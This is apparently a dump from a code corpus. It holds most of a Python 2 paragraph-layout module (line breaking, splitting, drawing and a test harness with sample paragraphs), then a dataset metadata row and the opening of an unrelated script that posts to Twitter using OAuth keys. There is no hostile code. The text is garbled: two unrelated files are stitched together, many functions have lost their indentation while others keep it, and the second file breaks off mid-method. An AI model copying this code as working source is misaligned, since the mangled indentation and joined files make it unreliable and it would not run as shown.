        and return (width, height).  Stores the broken-line structure on
        self.blPara for split()/draw() to reuse.  (Python 2 prints.)"""
        if self.debug:
            print id(self), "wrap"
            try:
                print repr(self.getPlainText()[:80])
            except:
                print "???"
        # work out widths array for breaking
        self.width = availWidth
        style = self.style
        leftIndent = style.leftIndent
        first_line_width = availWidth - (leftIndent+style.firstLineIndent) - style.rightIndent
        later_widths = availWidth - leftIndent - style.rightIndent
        if style.wordWrap == 'CJK':
            #use Asian text wrap algorithm to break characters
            blPara = self.breakLinesCJK([first_line_width, later_widths])
        else:
            blPara = self.breakLines([first_line_width, later_widths])
        self.blPara = blPara
        autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
        leading = style.leading
        if blPara.kind==1 and autoLeading not in ('','off'):
            # complex lines carry their own ascent/descent: sum per line
            height = 0
            if autoLeading=='max':
                for l in blPara.lines:
                    height += max(l.ascent-l.descent,leading)
            elif autoLeading=='min':
                for l in blPara.lines:
                    height += l.ascent - l.descent
            else:
                raise ValueError('invalid autoLeading value %r' % autoLeading)
        else:
            # simple case: uniform leading times the line count
            if autoLeading=='max':
                leading = max(leading,LEADING_FACTOR*style.fontSize)
            elif autoLeading=='min':
                leading = LEADING_FACTOR*style.fontSize
            height = len(blPara.lines) * leading
        self.height = height
        return self.width, height
def minWidth(self):
'Attempt to determine a minimum sensible width'
frags = self.frags
nFrags= len(frags)
if not nFrags: return 0
if nFrags==1:
f = frags[0]
fS = f.fontSize
fN = f.fontName
words = hasattr(f,'text') and split(f.text, ' ') or f.words
func = lambda w, fS=fS, fN=fN: stringWidth(w,fN,fS)
else:
words = _getFragWords(frags)
func = lambda x: x[0]
return max(map(func,words))
def _get_split_blParaFunc(self):
return self.blPara.kind==0 and _split_blParaSimple or _split_blParaHard
    def split(self,availWidth, availHeight):
        """Flowable protocol: split the paragraph at *availHeight*.

        Returns [] when nothing fits (or widow/orphan control vetoes the
        split), [self] when everything fits, else [P1, P2] where P1 holds
        the first s lines and P2 the remainder.  (Python 2 prints.)"""
        if self.debug:
            print id(self), "split"
        if len(self.frags)<=0: return []
        #the split information is all inside self.blPara
        if not hasattr(self,'blPara'):
            # return []
            self.wrap(availWidth,availHeight)
        blPara = self.blPara
        style = self.style
        autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
        leading = style.leading
        lines = blPara.lines
        # s: number of leading lines that fit; height: their total height
        if blPara.kind==1 and autoLeading not in ('','off'):
            s = height = 0
            if autoLeading=='max':
                for i,l in enumerate(blPara.lines):
                    h = max(l.ascent-l.descent,leading)
                    n = height+h
                    if n>availHeight+1e-8:
                        break
                    height = n
                    s = i+1
            elif autoLeading=='min':
                for i,l in enumerate(blPara.lines):
                    n = height+l.ascent-l.descent
                    if n>availHeight+1e-8:
                        break
                    height = n
                    s = i+1
            else:
                raise ValueError('invalid autoLeading value %r' % autoLeading)
        else:
            l = leading
            if autoLeading=='max':
                l = max(leading,LEADING_FACTOR*style.fontSize)
            elif autoLeading=='min':
                l = LEADING_FACTOR*style.fontSize
            s = int(availHeight/l)
            height = s*l
        n = len(lines)
        # NOTE(review): both getattr fallbacks query self for the same name
        # twice -- the inner getattr looks redundant (style.allowWidows was
        # perhaps intended).  Preserved as-is.
        allowWidows = getattr(self,'allowWidows',getattr(self,'allowWidows',1))
        allowOrphans = getattr(self,'allowOrphans',getattr(self,'allowOrphans',0))
        if not allowOrphans:
            if s<=1:    #orphan?
                del self.blPara
                return []
        if n<=s: return [self]
        if not allowWidows:
            if n==s+1: #widow?
                if (allowOrphans and n==3) or n>3:
                    s -= 1  #give the widow some company
                else:
                    del self.blPara #no room for adjustment; force the whole para onwards
                    return []
        func = self._get_split_blParaFunc()
        P1=self.__class__(None,style,bulletText=self.bulletText,frags=func(blPara,0,s))
        #this is a major hack
        P1.blPara = ParaLines(kind=1,lines=blPara.lines[0:s],aH=availHeight,aW=availWidth)
        P1._JustifyLast = 1
        P1._splitpara = 1
        P1.height = height
        P1.width = availWidth
        if style.firstLineIndent != 0:
            # continuation paragraph must not re-indent its first line
            style = deepcopy(style)
            style.firstLineIndent = 0
        P2=self.__class__(None,style,bulletText=None,frags=func(blPara,s,n))
        for a in ('autoLeading',    #possible attributes that might be directly on self.
                  ):
            if hasattr(self,a):
                setattr(P1,a,getattr(self,a))
                setattr(P2,a,getattr(self,a))
        return [P1,P2]
    def draw(self):
        """Flowable protocol: render the paragraph onto the current canvas."""
        #call another method for historical reasons.  Besides, I
        #suspect I will be playing with alternate drawing routines
        #so not doing it here makes it easier to switch.
        self.drawPara(self.debug)
def breakLines(self, width):
"""
Returns a broken line structure. There are two cases
A) For the simple case of a single formatting input fragment the output is
A fragment specifier with
- kind = 0
- fontName, fontSize, leading, textColor
- lines= A list of lines
Each line has two items.
1. unused width in points
2. word list
B) When there is more than one input formatting fragment the output is
A fragment specifier with
- kind = 1
- lines= A list of fragments each having fields
- extraspace (needed for justified)
- fontSize
- words=word list
each word is itself a fragment with
various settings
This structure can be used to easily draw paragraphs with the various alignments.
You can supply either a single width or a list of widths; the latter will have its
last item repeated until necessary. A 2-element list is useful when there is a
different first line indent; a longer list could be created to facilitate custom wraps
around irregular objects."""
if self.debug:
print id(self), "breakLines"
if not isinstance(width,(tuple,list)): maxWidths = [width]
else: maxWidths = width
lines = []
lineno = 0
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText,style,maxWidths)
maxWidth = maxWidths[0]
self.height = 0
autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
calcBounds = autoLeading not in ('','off')
frags = self.frags
nFrags= len(frags)
if nFrags==1 and not hasattr(frags[0],'cbDefn'):
f = frags[0]
fontSize = f.fontSize
fontName = f.fontName
ascent, descent = getAscentDescent(fontName,fontSize)
words = hasattr(f,'text') and split(f.text, ' ') or f.words
spaceWidth = stringWidth(' ', fontName, fontSize, self.encoding)
cLine = []
currentWidth = -spaceWidth # hack to get around extra space for word 1
for word in words:
#this underscores my feeling that Unicode throughout would be easier!
wordWidth = stringWidth(word, fontName, fontSize, self.encoding)
newWidth = currentWidth + spaceWidth + wordWidth
if newWidth <= maxWidth or not len(cLine):
# fit one more on this line
cLine.append(word)
currentWidth = newWidth
else:
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append((maxWidth - currentWidth, cLine))
cLine = [word]
currentWidth = wordWidth
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
#deal with any leftovers on the final line
if cLine!=[]:
if currentWidth>self.width: self.width = currentWidth
lines.append((maxWidth - currentWidth, cLine))
return f.clone(kind=0, lines=lines,ascent=ascent,descent=descent,fontSize=fontSize)
elif nFrags<=0:
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, ascent=style.fontSize,descent=-0.2*style.fontSize,
lines=[])
else:
if hasattr(self,'blPara') and getattr(self,'_splitpara',0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return self.blPara
n = 0
words = []
for w in _getFragWords(frags):
f=w[-1][0]
fontName = f.fontName
fontSize = f.fontSize
spaceWidth = stringWidth(' ',fontName, fontSize)
if not words:
currentWidth = -spaceWidth # hack to get around extra space for word 1
maxSize = fontSize
maxAscent, minDescent = getAscentDescent(fontName,fontSize)
wordWidth = w[0]
f = w[1][0]
if wordWidth>0:
newWidth = currentWidth + spaceWidth + wordWidth
else:
newWidth = currentWidth
#test to see if this frag is a line break. If it is we will only act on it
#if the current width is non-negative or the previous thing was a deliberate lineBreak
lineBreak = hasattr(f,'lineBreak')
endLine = (newWidth>maxWidth and n>0) or lineBreak
if not endLine:
if lineBreak: continue #throw it away
nText = w[1][1]
if nText: n += 1
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f,'cbDefn',None)
if getattr(cbDefn,'width',0):
descent,ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
else:
ascent, descent = getAscentDescent(f.fontName,fontSize)
else:
ascent, descent = getAscentDescent(f.fontName,fontSize)
maxSize = max(maxSize,fontSize)
maxAscent = max(maxAscent,ascent)
minDescent = min(minDescent,descent)
if not words:
g = f.clone()
words = [g]
g.text = nText
elif not _sameFrag(g,f):
if currentWidth>0 and ((nText!='' and nText[0]!=' ') or hasattr(f,'cbDefn')):
if hasattr(g,'cbDefn'):
i = len(words)-1
while i>=0:
wi = words[i]
cbDefn = getattr(wi,'cbDefn',None)
if cbDefn:
if not getattr(cbDefn,'width',0):
i -= 1
continue
if not wi.text.endswith(' '):
wi.text += ' '
break
else:
if not g.text.endswith(' '):
g.text += ' '
g = f.clone()
words.append(g)
g.text = nText
else:
if nText!='' and nText[0]!=' ':
g.text += ' ' + nText
for i in w[2:]:
g = i[0].clone()
g.text=i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g,'cbDefn',None)
if getattr(cbDefn,'width',0):
descent,ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
maxSize = max(maxSize,fontSize)
maxAscent = max(maxAscent,ascent)
minDescent = min(minDescent,descent)
currentWidth = newWidth
else: #either it won't fit, or it's a lineBreak tag
if lineBreak:
g = f.clone()
#del g.lineBreak
words.append(g)
if currentWidth>self.width: self.width = currentWidth
#end of line
lines.append(FragLine(extraSpace=maxWidth-currentWidth, wordCount=n,
lineBreak=lineBreak, words=words, fontSize=maxSize, ascent=maxAscent, descent=minDescent))
#start new line
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
if lineBreak:
n = 0
words = []
continue
currentWidth = wordWidth
n = 1
g = f.clone()
maxSize = g.fontSize
if calcBounds:
cbDefn = getattr(g,'cbDefn',None)
if getattr(cbDefn,'width',0):
minDescent,maxAscent = imgVRange(cbDefn.height,cbDefn.valign,maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName,maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName,maxSize)
words = [g]
g.text = w[1][1]
for i in w[2:]:
g = i[0].clone()
g.text=i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g,'cbDefn',None)
if getattr(cbDefn,'width',0):
descent,ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
else:
ascent, descent = getAscentDescent(g.fontName,fontSize)
maxSize = max(maxSize,fontSize)
maxAscent = max(maxAscent,ascent)
minDescent = min(minDescent,descent)
#deal with any leftovers on the final line
if words!=[]:
if currentWidth>self.width: self.width = currentWidth
lines.append(ParaLines(extraSpace=(maxWidth - currentWidth),wordCount=n,
words=words, fontSize=maxSize,ascent=maxAscent,descent=minDescent))
return ParaLines(kind=1, lines=lines)
return lines
    def breakLinesCJK(self, width):
        """Initially, the dumbest possible wrapping algorithm.
        Cannot handle font variations.

        width may be a single number or a list/tuple of per-line widths.
        Returns either a ParaLines instance or a clone of the first frag
        carrying the wrapped lines, mirroring what breakLines() produces.
        """
        if self.debug:
            print id(self), "breakLinesCJK"
        # Normalise the width argument to a list of per-line maximum widths.
        if not isinstance(width,(list,tuple)): maxWidths = [width]
        else: maxWidths = width
        style = self.style
        #for bullets, work out width and ensure we wrap the right amount onto line one
        _handleBulletWidth(self.bulletText, style, maxWidths)
        if len(self.frags)>1:
            # Multi-fragment paragraphs are delegated to the CJK frag splitter.
            autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
            calcBounds = autoLeading not in ('','off')
            return cjkFragSplit(self.frags, maxWidths, calcBounds)
            #raise ValueError('CJK Wordwrap can only handle one fragment per paragraph for now. Tried to handle:\ntext: %s\nfrags: %s' % (self.text, self.frags))
        elif not len(self.frags):
            # Empty paragraph: synthesise an empty line structure from the style.
            return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
                            textColor=style.textColor, lines=[],ascent=style.fontSize,descent=-0.2*style.fontSize)
        f = self.frags[0]
        if 1 and hasattr(self,'blPara') and getattr(self,'_splitpara',0):
            #NB this is an utter hack that awaits the proper information
            #preserving splitting algorithm
            return f.clone(kind=0, lines=self.blPara.lines)
        lines = []
        lineno = 0
        self.height = 0
        f = self.frags[0]
        # A frag carries either ready text or a pre-split word list.
        if hasattr(f,'text'):
            text = f.text
        else:
            text = ''.join(getattr(f,'words',[]))
        from reportlab.lib.textsplit import wordSplit
        # NOTE(review): only maxWidths[0] is used here, so per-line widths
        # beyond the first are ignored on this single-frag path.
        lines = wordSplit(text, maxWidths[0], f.fontName, f.fontSize)
        #the paragraph drawing routine assumes multiple frags per line, so we need an
        #extra list like this
        # [space, [text]]
        #
        wrappedLines = [(sp, [line]) for (sp, line) in lines]
        return f.clone(kind=0, lines=wrappedLines, ascent=f.fontSize, descent=-0.2*f.fontSize)
def beginText(self, x, y):
return self.canv.beginText(x, y)
    def drawPara(self,debug=0):
        """Draws a paragraph according to the given style.
        Returns the final y position at the bottom. Not safe for
        paragraphs without spaces e.g. Japanese; wrapping
        algorithm will go infinite."""
        if self.debug:
            print id(self), "drawPara", self.blPara.kind
        #stash the key facts locally for speed
        canvas = self.canv
        style = self.style
        blPara = self.blPara
        lines = blPara.lines
        leading = style.leading
        autoLeading = getattr(self,'autoLeading',getattr(style,'autoLeading',''))
        #work out the origin for line 1
        leftIndent = style.leftIndent
        cur_x = leftIndent
        # In debug mode force a visible yellow border / grey background so the
        # paragraph box can be seen; otherwise take them from the style.
        if debug:
            bw = 0.5
            bc = Color(1,1,0)
            bg = Color(0.9,0.9,0.9)
        else:
            bw = getattr(style,'borderWidth',None)
            bc = getattr(style,'borderColor',None)
            bg = style.backColor
        #if has a background or border, draw it
        if bg or (bc and bw):
            canvas.saveState()
            op = canvas.rect
            kwds = dict(fill=0,stroke=0)
            if bc and bw:
                canvas.setStrokeColor(bc)
                canvas.setLineWidth(bw)
                kwds['stroke'] = 1
                br = getattr(style,'borderRadius',0)
                # Rounded corners only when a radius is set and not debugging.
                if br and not debug:
                    op = canvas.roundRect
                    kwds['radius'] = br
            if bg:
                canvas.setFillColor(bg)
                kwds['fill'] = 1
            bp = getattr(style,'borderPadding',0)
            # Draw the box padded outwards by borderPadding on all sides.
            op(leftIndent-bp,
               -bp,
               self.width - (leftIndent+style.rightIndent)+2*bp,
               self.height+2*bp,
               **kwds)
            canvas.restoreState()
        nLines = len(lines)
        bulletText = self.bulletText
        if nLines > 0:
            # Pad the per-line x-offsets so there is one per line, repeating
            # the last known offset.
            _offsets = getattr(self,'_offsets',[0])
            _offsets += (nLines-len(_offsets))*[_offsets[-1]]
            canvas.saveState()
            #canvas.addLiteral('%% %s.drawPara' % _className(self))
            alignment = style.alignment
            offset = style.firstLineIndent+_offsets[0]
            lim = nLines-1
            noJustifyLast = not (hasattr(self,'_JustifyLast') and self._JustifyLast)
            # kind==0: uniform formatting (a single font/colour for the whole
            # paragraph); otherwise each line carries its own frag data.
            if blPara.kind==0:
                if alignment == TA_LEFT:
                    dpl = _leftDrawParaLine
                elif alignment == TA_CENTER:
                    dpl = _centerDrawParaLine
                elif self.style.alignment == TA_RIGHT:
                    dpl = _rightDrawParaLine
                elif self.style.alignment == TA_JUSTIFY:
                    dpl = _justifyDrawParaLine
                f = blPara
                cur_y = self.height - getattr(f,'ascent',f.fontSize) #TODO fix XPreformatted to remove this hack
                if bulletText:
                    offset = _drawBullet(canvas,offset,cur_y,bulletText,style)
                #set up the font etc.
                canvas.setFillColor(f.textColor)
                tx = self.beginText(cur_x, cur_y)
                if autoLeading=='max':
                    leading = max(leading,LEADING_FACTOR*f.fontSize)
                elif autoLeading=='min':
                    leading = LEADING_FACTOR*f.fontSize
                #now the font for the rest of the paragraph
                tx.setFont(f.fontName, f.fontSize, leading)
                ws = lines[0][0]
                t_off = dpl( tx, offset, ws, lines[0][1], noJustifyLast and nLines==1)
                # Only set up the (expensive) XtraState bookkeeping when some
                # decoration (underline/strike/link) actually has to be drawn.
                if f.underline or f.link or f.strike:
                    xs = tx.XtraState = ABag()
                    xs.cur_y = cur_y
                    xs.f = f
                    xs.style = style
                    xs.lines = lines
                    xs.underlines = []
                    xs.underlineColor = None
                    # XXX Modified for XHTML2PDF
                    xs.backgrounds = []
                    xs.backgroundColor = None
                    xs.backgroundFontSize = None
                    xs.strikes = []
                    xs.strikeColor = None
                    # XXX Modified for XHTML2PDF
                    xs.strikeFontSize = None
                    xs.links = []
                    xs.link = f.link
                    canvas.setStrokeColor(f.textColor)
                    dx = t_off + leftIndent
                    # ws (extra space) only matters for justified lines.
                    if dpl != _justifyDrawParaLine: ws = 0
                    # XXX Never underline!
                    underline = f.underline
                    strike = f.strike
                    link = f.link
                    if underline: _do_under_line(0, dx, ws, tx)
                    if strike: _do_under_line(0, dx, ws, tx, lm=0.125)
                    if link: _do_link_line(0, dx, ws, tx)
                    #now the middle of the paragraph, aligned with the left margin which is our origin.
                    for i in xrange(1, nLines):
                        ws = lines[i][0]
                        t_off = dpl( tx, _offsets[i], ws, lines[i][1], noJustifyLast and i==lim)
                        if dpl!=_justifyDrawParaLine: ws = 0
                        if underline: _do_under_line(i, t_off+leftIndent, ws, tx)
                        if strike: _do_under_line(i, t_off+leftIndent, ws, tx, lm=0.125)
                        if link: _do_link_line(i, t_off+leftIndent, ws, tx)
                else:
                    # No decorations: just lay out the remaining lines.
                    for i in xrange(1, nLines):
                        dpl( tx, _offsets[i], lines[i][0], lines[i][1], noJustifyLast and i==lim)
            else:
                # Complex (multi-frag) paragraph: lines[0] is a FragLine.
                f = lines[0]
                cur_y = self.height - getattr(f,'ascent',f.fontSize) #TODO fix XPreformatted to remove this hack
                # default?
                dpl = _leftDrawParaLineX
                if bulletText:
                    oo = offset
                    offset = _drawBullet(canvas,offset,cur_y,bulletText,style)
                if alignment == TA_LEFT:
                    dpl = _leftDrawParaLineX
                elif alignment == TA_CENTER:
                    dpl = _centerDrawParaLineX
                elif self.style.alignment == TA_RIGHT:
                    dpl = _rightDrawParaLineX
                elif self.style.alignment == TA_JUSTIFY:
                    dpl = _justifyDrawParaLineX
                else:
                    raise ValueError("bad align %s" % repr(alignment))
                #set up the font etc.
                tx = self.beginText(cur_x, cur_y)
                # Per-fragment drawing state consulted by the _do* helpers.
                xs = tx.XtraState = ABag()
                xs.textColor = None
                # XXX Modified for XHTML2PDF
                xs.backColor = None
                xs.rise = 0
                xs.underline = 0
                xs.underlines = []
                xs.underlineColor = None
                # XXX Modified for XHTML2PDF
                xs.background = 0
                xs.backgrounds = []
                xs.backgroundColor = None
                xs.backgroundFontSize = None
                xs.strike = 0
                xs.strikes = []
                xs.strikeColor = None
                # XXX Modified for XHTML2PDF
                xs.strikeFontSize = None
                xs.links = []
                xs.link = None
                xs.leading = style.leading
                xs.leftIndent = leftIndent
                tx._leading = None
                tx._olb = None
                xs.cur_y = cur_y
                xs.f = f
                xs.style = style
                xs.autoLeading = autoLeading
                tx._fontname,tx._fontsize = None, None
                dpl( tx, offset, lines[0], noJustifyLast and nLines==1)
                _do_post_text(tx)
                #now the middle of the paragraph, aligned with the left margin which is our origin.
                for i in xrange(1, nLines):
                    f = lines[i]
                    dpl( tx, _offsets[i], f, noJustifyLast and i==lim)
                    _do_post_text(tx)
            canvas.drawText(tx)
            canvas.restoreState()
def getPlainText(self,identify=None):
"""Convenience function for templates which want access
to the raw text, without XML tags. """
frags = getattr(self,'frags',None)
if frags:
plains = []
for frag in frags:
if hasattr(frag, 'text'):
plains.append(frag.text)
return join(plains, '')
elif identify:
text = getattr(self,'text',None)
if text is None: text = repr(self)
return text
else:
return ''
def getActualLineWidths0(self):
"""Convenience function; tells you how wide each line
actually is. For justified styles, this will be
the same as the wrap width; for others it might be
useful for seeing if paragraphs will fit in spaces."""
assert hasattr(self, 'width'), "Cannot call this method before wrap()"
if self.blPara.kind:
func = lambda frag, w=self.width: w - frag.extraSpace
else:
func = lambda frag, w=self.width: w - frag[0]
return map(func,self.blPara.lines)
if __name__=='__main__': #NORUNTESTS
def dumpParagraphLines(P):
print 'dumpParagraphLines(<Paragraph @ %d>)' % id(P)
lines = P.blPara.lines
for l,line in enumerate(lines):
line = lines[l]
if hasattr(line,'words'):
words = line.words
else:
words = line[1]
nwords = len(words)
print 'line%d: %d(%s)\n ' % (l,nwords,str(getattr(line,'wordCount','Unknown'))),
for w in xrange(nwords):
print "%d:'%s'"%(w,getattr(words[w],'text',words[w])),
print
def fragDump(w):
R= ["'%s'" % w[1]]
for a in ('fontName', 'fontSize', 'textColor', 'rise', 'underline', 'strike', 'link', 'cbDefn','lineBreak'):
if hasattr(w[0],a):
R.append('%s=%r' % (a,getattr(w[0],a)))
return ', '.join(R)
def dumpParagraphFrags(P):
print 'dumpParagraphFrags(<Paragraph @ %d>) minWidth() = %.2f' % (id(P), P.minWidth())
frags = P.frags
n =len(frags)
for l in xrange(n):
print "frag%d: '%s' %s" % (l, frags[l].text,' '.join(['%s=%s' % (k,getattr(frags[l],k)) for k in frags[l].__dict__ if k!=text]))
l = 0
cum = 0
for W in _getFragWords(frags):
cum += W[0]
print "fragword%d: cum=%3d size=%d" % (l, cum, W[0]),
for w in W[1:]:
print '(%s)' % fragDump(w),
print
l += 1
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import cm
import sys
TESTS = sys.argv[1:]
if TESTS==[]: TESTS=['4']
def flagged(i,TESTS=TESTS):
return 'all' in TESTS or '*' in TESTS or str(i) in TESTS
styleSheet = getSampleStyleSheet()
B = styleSheet['BodyText']
style = ParagraphStyle("discussiontext", parent=B)
style.fontName= 'Helvetica'
if flagged(1):
text='''The <font name=courier color=green>CMYK</font> or subtractive method follows the way a printer
mixes three pigments (cyan, magenta, and yellow) to form colors.
Because mixing chemicals is more difficult than combining light there
is a fourth parameter for darkness. For example a chemical
combination of the <font name=courier color=green>CMY</font> pigments generally never makes a perfect
black -- instead producing a muddy color -- so, to get black printers
don't use the <font name=courier color=green>CMY</font> pigments but use a direct black ink. Because
<font name=courier color=green>CMYK</font> maps more directly to the way printer hardware works it may
be the case that &| & | colors specified in <font name=courier color=green>CMYK</font> will provide better fidelity
and better control when printed.
'''
P=Paragraph(text,style)
dumpParagraphFrags(P)
aW, aH = 456.0, 42.8
w,h = P.wrap(aW, aH)
dumpParagraphLines(P)
S = P.split(aW,aH)
for s in S:
s.wrap(aW,aH)
dumpParagraphLines(s)
aH = 500
if flagged(2):
P=Paragraph("""Price<super><font color="red">*</font></super>""", styleSheet['Normal'])
dumpParagraphFrags(P)
w,h = P.wrap(24, 200)
dumpParagraphLines(P)
if flagged(3):
text = """Dieses Kapitel bietet eine schnelle <b><font color=red>Programme :: starten</font></b>
<onDraw name=myIndex label="Programme :: starten">
<b><font color=red>Eingabeaufforderung :: (>>>)</font></b>
<onDraw name=myIndex label="Eingabeaufforderung :: (>>>)">
<b><font color=red>>>> (Eingabeaufforderung)</font></b>
<onDraw name=myIndex label=">>> (Eingabeaufforderung)">
Einführung in Python <b><font color=red>Python :: Einführung</font></b>
<onDraw name=myIndex label="Python :: Einführung">.
Das Ziel ist, die grundlegenden Eigenschaften von Python darzustellen, ohne
sich zu sehr in speziellen Regeln oder Details zu verstricken. Dazu behandelt
dieses Kapitel kurz die wesentlichen Konzepte wie Variablen, Ausdrücke,
Kontrollfluss, Funktionen sowie Ein- und Ausgabe. Es erhebt nicht den Anspruch,
umfassend zu sein."""
P=Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(4):
text='''Die eingebaute Funktion <font name=Courier>range(i, j [, stride])</font><onDraw name=myIndex label="eingebaute Funktionen::range()"><onDraw name=myIndex label="range() (Funktion)"><onDraw name=myIndex label="Funktionen::range()"> erzeugt eine Liste von Ganzzahlen und füllt sie mit Werten <font name=Courier>k</font>, für die gilt: <font name=Courier>i <= k < j</font>. Man kann auch eine optionale Schrittweite angeben. Die eingebaute Funktion <font name=Courier>xrange()</font><onDraw name=myIndex label="eingebaute Funktionen::xrange()"><onDraw name=myIndex label="xrange() (Funktion)"><onDraw name=myIndex label="Funktionen::xrange()"> erfüllt einen ähnlichen Zweck, gibt aber eine unveränderliche Sequenz vom Typ <font name=Courier>XRangeType</font><onDraw name=myIndex label="XRangeType"> zurück. Anstatt alle Werte in der Liste abzuspeichern, berechnet diese Liste ihre Werte, wann immer sie angefordert werden. Das ist sehr viel speicherschonender, wenn mit sehr langen Listen von Ganzzahlen gearbeitet wird. <font name=Courier>XRangeType</font> kennt eine einzige Methode, <font name=Courier>s.tolist()</font><onDraw name=myIndex label="XRangeType::tolist() (Methode)"><onDraw name=myIndex label="s.tolist() (Methode)"><onDraw name=myIndex label="Methoden::s.tolist()">, die seine Werte in eine Liste umwandelt.'''
aW = 420
aH = 64.4
P=Paragraph(text, B)
dumpParagraphFrags(P)
w,h = P.wrap(aW,aH)
print 'After initial wrap',w,h
dumpParagraphLines(P)
S = P.split(aW,aH)
dumpParagraphFrags(S[0])
w0,h0 = S[0].wrap(aW,aH)
print 'After split wrap',w0,h0
dumpParagraphLines(S[0])
if flagged(5):
text = '<para> %s <![CDATA[</font></b>& %s < >]]></para>' % (chr(163),chr(163))
P=Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(6):
for text in ['''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''',
'''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''',
'''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''',
]:
P=Paragraph(text, styleSheet['Normal'], caseSensitive=0)
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(7):
text = """<para align="CENTER" fontSize="24" leading="30"><b>Generated by:</b>Dilbert</para>"""
P=Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
if flagged(8):
text ="""- bullet 0<br/>- bullet 1<br/>- bullet 2<br/>- bullet 3<br/>- bullet 4<br/>- bullet 5"""
P=Paragraph(text, styleSheet['Normal'])
dumpParagraphFrags(P)
w,h = P.wrap(6*72, 9.7*72)
dumpParagraphLines(P)
S = P.split(6*72,h/2.0)
print len(S)
dumpParagraphLines(S[0])
dumpParagraphLines(S[1])
if flagged(9):
text="""Furthermore, the fundamental error of
regarding <img src="../docs/images/testimg.gif" width="3" height="7"/> functional notions as
categorial delimits a general
convention regarding the forms of the<br/>
grammar. I suggested that these results
would follow from the assumption that"""
P=Paragraph(text,ParagraphStyle('aaa',parent=styleSheet['Normal'],align=TA_JUSTIFY))
dumpParagraphFrags(P)
w,h = P.wrap(6*cm-12, 9.7*72)
dumpParagraphLines(P)
if flagged(10):
text="""a b c\xc2\xa0d e f"""
P=Paragraph(text,ParagraphStyle('aaa',parent=styleSheet['Normal'],align=TA_JUSTIFY))
dumpParagraphFrags(P)
w,h = P.wrap(6*cm-12, 9.7*72)
dumpParagraphLines(P)
| apache-2.0 |
mrmendee/Twitter-get-word | examples/tweet.py | 28 | 4205 | #!/usr/bin/python2.4
'''Post a message to twitter'''
__author__ = 'dewitt@google.com'
import ConfigParser
import getopt
import os
import sys
import twitter
USAGE = '''Usage: tweet [options] message
This script posts a message to Twitter.
Options:
-h --help : print this help
--consumer-key : the twitter consumer key
--consumer-secret : the twitter consumer secret
--access-key : the twitter access token key
--access-secret : the twitter access token secret
--encoding : the character set encoding used in input strings, e.g. "utf-8". [optional]
Documentation:
If either of the command line flags are not present, the environment
variables TWEETUSERNAME and TWEETPASSWORD will then be checked for your
consumer_key or consumer_secret, respectively.
If neither the command line flags nor the enviroment variables are
present, the .tweetrc file, if it exists, can be used to set the
default consumer_key and consumer_secret. The file should contain the
following three lines, replacing *consumer_key* with your consumer key, and
*consumer_secret* with your consumer secret:
A skeletal .tweetrc file:
[Tweet]
consumer_key: *consumer_key*
consumer_secret: *consumer_password*
access_key: *access_key*
access_secret: *access_password*
'''
def PrintUsageAndExit():
  """Write the usage text to stdout and terminate with exit status 2."""
  sys.stdout.write(USAGE + '\n')
  sys.exit(2)
def GetConsumerKeyEnv():
  """Return the consumer key from $TWEETUSERNAME, or None when unset."""
  return os.environ.get('TWEETUSERNAME')
def GetConsumerSecretEnv():
  """Return the consumer secret from $TWEETPASSWORD, or None when unset."""
  return os.environ.get('TWEETPASSWORD')
def GetAccessKeyEnv():
  """Return the access token key from $TWEETACCESSKEY, or None when unset."""
  return os.environ.get('TWEETACCESSKEY')
def GetAccessSecretEnv():
  """Return the access token secret from $TWEETACCESSSECRET, or None when unset."""
  return os.environ.get('TWEETACCESSSECRET')
class TweetRc(object):
  """Reads default OAuth credentials from the user's ~/.tweetrc file.

  The file must contain a [Tweet] section with consumer_key,
  consumer_secret, access_key and access_secret options; a missing
  file, section or option is reported as None.
  """
  def __init__(self):
    # Lazily-created ConfigParser instance; see _GetConfig().
    self._config = None
  def GetConsumerKey(self):
    return self._GetOption('consumer_key')
  def GetConsumerSecret(self):
    return self._GetOption('consumer_secret')
  def GetAccessKey(self):
    return self._GetOption('access_key')
  def GetAccessSecret(self):
    return self._GetOption('access_secret')
  def _GetOption(self, option):
    """Return the named option from the [Tweet] section, or None.

    BUGFIX: was a bare "except:" which also swallowed SystemExit,
    KeyboardInterrupt and genuine programming errors; only config-file
    problems (missing section/option, parse errors) mean "unset".
    """
    try:
      return self._GetConfig().get('Tweet', option)
